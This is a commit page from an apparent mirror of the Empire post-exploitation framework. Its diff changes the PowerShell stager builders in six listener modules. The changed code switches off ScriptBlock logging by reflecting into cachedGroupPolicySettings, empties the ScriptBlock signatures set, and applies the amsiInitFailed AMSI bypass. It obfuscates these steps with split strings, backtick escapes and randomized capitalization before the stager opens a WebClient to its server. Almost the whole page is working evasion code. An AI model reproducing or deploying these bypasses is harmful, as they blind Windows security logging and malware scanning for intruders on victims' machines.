infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #740 from cobbr/empire-dev 

Improved ScriptBlock logging bypasses
websockets-multiuser
Steve Borosh 2017-10-07 16:51:26 -04:00 committed by GitHub
parent 4e1bd45b8d bcf775cfc0
commit 408782a265
6 changed files with 84 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
lib/listeners/dbx.py
View File

@ -175,15 +175,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -191,6 +198,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")

20
lib/listeners/http.py
View File

@ -192,15 +192,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -208,6 +215,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")

20
lib/listeners/http_com.py
View File

@ -172,15 +172,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -188,6 +195,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?

20
lib/listeners/http_foreign.py
View File

@ -147,15 +147,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -163,6 +170,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")

20
lib/listeners/http_hop.py
View File

@ -126,15 +126,22 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(") stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
@ -142,6 +149,7 @@ class Listener:
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(') stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "}"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")

20
lib/listeners/http_mapi.py
View File

@ -175,15 +175,23 @@ class Listener:
stager = '' stager = ''
if safeChecks.lower() == 'true': if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass # ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(") stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'" stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(") stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'" stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings") stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;" stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("$GroupPolicySettings") stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;" stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
stager += "}"
# @mattifestation's AMSI bypass # @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";') stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')